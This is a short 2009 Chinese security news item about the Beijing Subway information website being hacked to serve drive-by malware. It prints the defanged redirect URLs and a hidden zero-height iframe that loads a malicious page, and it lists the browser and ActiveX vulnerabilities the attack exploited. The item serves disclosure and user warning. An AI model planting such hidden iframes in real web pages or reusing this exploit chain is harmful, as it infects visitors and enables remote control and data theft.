北京地铁信息网被挂马用户需警惕中招

2009.4.23   来源：赛迪    作者：          原文

 北京地铁信息网挂马事件(hxxp://www.subway.bj.cn/)被黑客植入病毒，用户如果访问该网页，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。

该网站问题代码：

hxxp://badf3.cn问题框架代码：

hxxp://qq.qczz123.cn/yahoo/q8.htm

hxxp://qq.qczz123.cn/yahoo/q8.htm问题框架代码：

 <iframe src=hxxp://360.qzcc520.cn/new/index2.htm width=100 height=0></Iframe>

hxxp://360.qzcc520.cn/new/index2.htm问题框架代码

hxxp://360.qzcc520.cn/new/Cute.htm问题框架代码

该挂马网页通过以下几个漏洞进行传播：

Adobe Flash Player SWF文件漏洞

MS06-014漏洞

MS09-002漏洞

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

联众世界GLIEDown2.dll ActiveX控件溢出漏洞

MS08-041漏洞

暴风影音2 mps.dll组件多个缓冲区溢出漏洞

MS08-053漏洞